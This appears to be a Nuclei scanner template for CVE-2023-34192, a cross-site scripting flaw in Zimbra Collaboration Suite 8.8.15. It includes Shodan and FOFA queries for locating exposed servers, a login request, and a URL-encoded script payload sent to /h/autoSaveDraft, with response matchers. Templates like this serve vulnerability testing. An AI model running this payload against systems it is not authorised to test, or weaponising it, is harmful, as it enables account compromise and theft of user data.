id: CVE-2023-34192 info: name: Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting author: ritikchaddha severity: critical description: | Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite (ZCS). reference: - https://mp.weixin.qq.com/s/Vz8yL4xBlZN5EQQ_BG0OOA - https://www.helpnetsecurity.com/2023/07/17/cve-2023-34192/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-34192 - https://wiki.zimbra.com/wiki/Security_Center - https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H cvss-score: 9 cve-id: CVE-2023-34192 cwe-id: CWE-79 epss-score: 0.17094 epss-percentile: 0.95587 cpe: cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:* metadata: max-request: 2 vendor: zimbra product: collaboration shodan-query: - http.favicon.hash:475145467 - http.favicon.hash:"1624375939" - http.favicon.hash:"475145467" fofa-query: - icon_hash="475145467" - icon_hash="1624375939" - app="zimbra-邮件系统" tags: cve,cve2023,zimbra,xss,authenticated http: - raw: - | POST /zimbra/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded loginOp=login&username={{username}}&password={{password}}&client=preferred - | GET /h/autoSaveDraft?draftid=aaaaaaaaaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cbbbbbbbb HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body_2 words: - "" - "zimbra" condition: and - type: word part: header_2 words: - text/html - type: status part: header_2 status: - 200 # digest: 4a0a0047304502206e6e2e31f12f413d607f331c70a813d47580ec6ec53dcce86d690fd6505686a2022100bbd8564bab04300d1f08a1cf09442181e45d39f92e9b67e9190f3b16b34ed363:922c64590222798bb761d5b6d8e72950